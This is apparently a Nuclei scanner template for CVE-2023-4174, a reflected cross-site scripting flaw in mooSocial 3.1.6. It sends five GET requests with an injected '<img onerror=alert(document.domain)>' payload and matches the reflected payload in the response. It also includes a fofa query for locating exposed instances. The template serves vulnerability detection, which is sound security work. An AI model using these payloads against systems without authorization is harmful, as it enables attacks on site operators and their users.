id: CVE-2023-4174

info:
  name: mooSocial 3.1.6 - Reflected Cross Site Scripting
  author: momika233
  severity: medium
  description: |
    A vulnerability has been found in mooSocial mooStore 3.1.6 and classified as problematic. Affected by this vulnerability is an unknown functionality. The manipulation leads to cross site scripting. The attack can be launched remotely.
  reference:
    - https://www.exploit-db.com/exploits/51671
    - https://nvd.nist.gov/vuln/detail/CVE-2023-4174
    - https://packetstormsecurity.com/files/174017/Social-Commerce-3.1.6-Cross-Site-Scripting.html
  metadata:
    max-request: 5
    verified: true
    fofa-query: icon_hash="702863115"
  tags: cve,cve2023,moosocial,xss

http:
  - method: GET
    path:
      - '{{BaseURL}}/search/index?q="><img+src=a+onerror=alert(document.domain)>ridxm'
      - '{{BaseURL}}/stores"><img+src=a+onerror=alert(document.domain)>ridxm/all-products?store_id=&keyword=&price_from=&price_to=&rating=&store_category_id=&sortby=most_recent'
      - '{{BaseURL}}/user_info"><img+src=a+onerror=alert(document.domain)>ridxm/index/friends'
      - '{{BaseURL}}/faqs"><img+src=a+onerror=alert(document.domain)>ridxm/index?content_search="><img+src=a+onerror=alert(document.domain)>ridxm'
      - '{{BaseURL}}/classifieds"><img+src=a+onerror=alert(document.domain)>ridxm/search?category=1'

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<img src=a onerror=alert(document.domain)>ridxm"
          - "mooSocial"
        condition: and

      - type: word
        part: header
        words:
          - "text/html"